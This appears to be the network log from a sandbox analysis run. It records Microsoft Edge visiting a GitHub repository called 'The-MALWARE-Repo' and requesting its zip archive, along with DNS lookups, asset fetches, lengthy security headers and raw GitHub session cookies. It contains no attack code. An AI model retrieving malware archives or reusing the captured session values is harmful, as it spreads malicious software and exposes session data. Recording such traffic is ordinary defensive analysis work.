x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1218
x-github-request-id: C83D:90F1B:5F78D6:6E3A60:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/branch-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/branch-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
github-verified-fetch: true
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"ced17b2112827c8d5577d524acbe58b5"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 632
x-github-request-id: C83D:90F1B:5F78D6:6E3A5F:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/tag-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/tag-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
github-verified-fetch: true
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"8902c7088699d5c25402933819980cd9"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: a0cd8ccbdfb93e9af77e145e1ae6e77b8c460cb2545ca40647a08858d06f9f2a
accept-ranges: bytes
content-length: 95
x-github-request-id: C83D:90F1B:5F78D6:6E3A62:670163ED
GET

https://github.com/manifest.json

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /manifest.json HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:05:57 GMT
content-type: application/manifest+json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=604800, public
etag: W/"c75e05794d72230a695e880f1a6c83a4"
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 474
x-github-request-id: C83D:90F1B:5F78F8:6E3A7A:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 302

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:14 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master
cache-control: max-age=0, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: C83D:90F1B:5F7C99:6E3E8F:670163ED
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

avatars.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

avatars.githubusercontent.com

IN A

Response

avatars.githubusercontent.com

IN A

185.199.109.133

avatars.githubusercontent.com

IN A

185.199.111.133

avatars.githubusercontent.com

IN A

185.199.110.133

avatars.githubusercontent.com

IN A

185.199.108.133
DNS

avatars.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

avatars.githubusercontent.com

IN A

Response

avatars.githubusercontent.com

IN A

185.199.109.133

avatars.githubusercontent.com

IN A

185.199.108.133

avatars.githubusercontent.com

IN A

185.199.111.133

avatars.githubusercontent.com

IN A

185.199.110.133
DNS

github.githubassets.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github.githubassets.com

IN A

Response

github.githubassets.com

IN A

185.199.111.154

github.githubassets.com

IN A

185.199.108.154

github.githubassets.com

IN A

185.199.109.154

github.githubassets.com

IN A

185.199.110.154
DNS

github.githubassets.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github.githubassets.com

IN A

Response

github.githubassets.com

IN A

185.199.108.154

github.githubassets.com

IN A

185.199.109.154

github.githubassets.com

IN A

185.199.111.154

github.githubassets.com

IN A

185.199.110.154
GET

https://avatars.githubusercontent.com/u/63458929?s=64&v=4

msedge.exe

Remote address:

185.199.109.133:443

Request

GET /u/63458929?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "1d9f1acf397d81e762e9ede9d36dd95eb2e889d8dc41c4f240aa17ffcd5ff02f"
last-modified: Thu, 20 Jul 2023 19:54:24 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 61B7:2EB5CB:223C8C3:2404433:66FB99FD
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
via: 1.1 varnish
x-served-by: cache-ams2100128-AMS
x-cache: HIT
x-cache-hits: 0
x-timer: S1728144364.346961,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 9d03b876d2496880045612c567c293bf07cd408d
expires: Sat, 05 Oct 2024 16:11:04 GMT
source-age: 379375
vary: Authorization,Accept-Encoding
content-length: 1266
GET

https://avatars.githubusercontent.com/u/123590232?s=64&v=4

msedge.exe

Remote address:

185.199.109.133:443

Request

GET /u/123590232?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Sat, 27 Sep 2014 01:35:06 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: A893:5BC3E:B21136:BA43C5:66F3BE67
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
via: 1.1 varnish
x-served-by: cache-ams2100128-AMS
x-cache: HIT
x-cache-hits: 0
x-timer: S1728144364.346986,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 4b6cc80a5a762d733dc0edec316faf7f765f9e1f
expires: Sat, 05 Oct 2024 16:11:04 GMT
source-age: 894341
vary: Authorization,Accept-Encoding
content-length: 1505
GET

https://avatars.githubusercontent.com/u/63458929?v=4&size=40

msedge.exe

Remote address:

185.199.109.133:443

Request

GET /u/63458929?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Sat, 04 Oct 2014 14:22:16 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 650F:3EE96A:363516F:38EADEE:66FCF62D
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:06 GMT
via: 1.1 varnish
x-served-by: cache-ams2100128-AMS
x-cache: HIT
x-cache-hits: 0
x-timer: S1728144366.089859,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 15ced7235ee2b67d785d611ae06a42eed2bfc727
expires: Sat, 05 Oct 2024 16:11:06 GMT
source-age: 290240
vary: Authorization,Accept-Encoding
content-length: 1505
GET

https://github.githubassets.com/assets/light-3e154969b9f9.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/light-3e154969b9f9.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
